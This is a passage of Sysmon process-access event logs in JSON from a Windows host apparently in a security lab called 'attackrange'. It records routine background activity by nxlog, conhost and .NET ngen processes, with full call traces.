06:59:02.866","SourceProcessGUID":"{E2A3D6B1-12B4-5F25-0000-001061870900}","SourceProcessId":"3828","SourceThreadId":"4732","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","TargetProcessId":"2312","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6890,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:03.553\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:03.553","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6891,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:04.553\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:04.553","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6892,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:05.553\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:05.553","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:06","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6893,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:06.553\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:06.553","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6894,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:07.553\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:07.553","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6895,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:08.225\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12BC-5F25-0000-00102DC20900}\r\nTargetProcessId: 4280\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:08.225","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12BC-5F25-0000-00102DC20900}","TargetProcessId":"4280","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
